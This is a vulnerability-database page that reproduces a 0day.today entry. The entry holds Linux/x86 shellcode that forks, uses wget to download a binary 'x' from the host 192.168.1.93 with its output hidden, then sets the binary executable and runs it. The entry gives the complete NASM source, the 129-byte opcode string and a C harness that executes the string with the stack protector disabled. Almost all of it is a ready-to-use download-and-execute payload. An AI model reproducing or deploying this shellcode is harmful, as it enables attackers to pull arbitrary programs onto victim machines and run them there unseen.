Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux/x86 - Chmod + Execute (/usr/bin/wget 192.168.1.93//x) Hide Output Shellcode (129 bytes)

🗓️ 30 Jun 2019 00:00:00Reported by lockedbyteType 
zdt
 zdt🔗 0day.today👁 185 Views

Linux/x86 Chmod + Execute (/usr/bin/wget 192.168.1.93//x) Hide Output Shellcode (129 bytes

Code
/**

; Shellcode 129 Bytes
; download (via wget) + chmod + execute shellcode + hide output
;      Exec: /usr/bin/wget http://192.168.1.93//x > /dev/null 2>&1
;

global _start

section .text

_start:

    ;fork
    xor eax,eax
    mov al,0x2
    int 0x80
    xor ebx,ebx
    cmp eax,ebx
    jz download
  
    ; wait(NULL)
    xor eax,eax
    mov al,0x7
    int 0x80
        
    ; give execution permissions to the binary x
    xor ecx,ecx
    xor eax, eax
    push eax
    mov al, 0xf
    push 0x78
    mov ebx, esp
    xor ecx, ecx
    mov cx, 0x1ff
    int 0x80
    
    ; execution of binary x
    xor eax, eax
    push eax
    push 0x78
    mov ebx, esp
    push eax
    mov edx, esp
    push ebx
    mov ecx, esp
    mov al, 11
    int 0x80
    
download:

    push 0xb
    pop eax
    cdq
    push edx
    ; download uri
    mov eax, 0x31263e32 ; 1&>2 hide_output[4] 
    mov eax, 0x6c6c756e ; llun/  hide_output[3]
    mov eax, 0x2f766564 ; ved  hide_output[2]
    mov eax, 0x2f3e20 ; />  hide_output[1]
    mov eax, 0x782f2f ; x//  path[1]
    mov eax, 0x33392e31 ;93.1 addr[3]
    mov eax, 0x2e383631 ;.861 addr[2]
    mov eax, 0x2e323931 ;.291  addr[1]
    push eax
    mov ecx,esp
    push edx
    
    ; download execution in /usr/bin/wget
    
    push 0x74 ;t
    push 0x6567772f ;egw/
    push 0x6e69622f ;nib/
    push 0x7273752f ;rsu/
    mov ebx,esp
    push edx
    push ecx
    push ebx
    mov ecx,esp
    int 0x80
    

**/

// nasm -felf32 wget.nasm -o wget.o
// ld -m elf_i386 wget.o -o wget

#include <stdio.h>
#include <string.h>

// gcc -z execstack -fno-stack-protector shellcode.c -o shellcode

// SHELLCODE 129 Bytes

char buf[] = "\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8"
"\x74\x2a\x31\xc0\xb0\x07\xcd\x80\x31\xc9"
"\x31\xc0\x50\xb0\x0f\x6a\x78\x89\xe3\x31"
"\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50"
"\x6a\x78\x89\xe3\x50\x89\xe2\x53\x89\xe1"
"\xb0\x0b\xcd\x80\x6a\x0b\x58\x99\x52\xb8"
"\x32\x3e\x26\x31\xb8\x6e\x75\x6c\x6c\xb8"
"\x64\x65\x76\x2f\xb8\x20\x3e\x2f\x00\xb8"
"\x2f\x2f\x78\x00\xb8\x31\x2e\x39\x33\xb8"
"\x31\x36\x38\x2e\xb8\x31\x39\x32\x2e\x50"
"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65"
"\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72"
"\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";


void main(int argc, char **argv)
{
        int (*func)();
        func = (int (*)()) buf;
        (int)(*func)();
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
30 Jun 2019 00:00Current
7.4High risk
Vulners AI Score7.4
shellcodedownloadchmodexecutehide outputwgetlinuxx86
185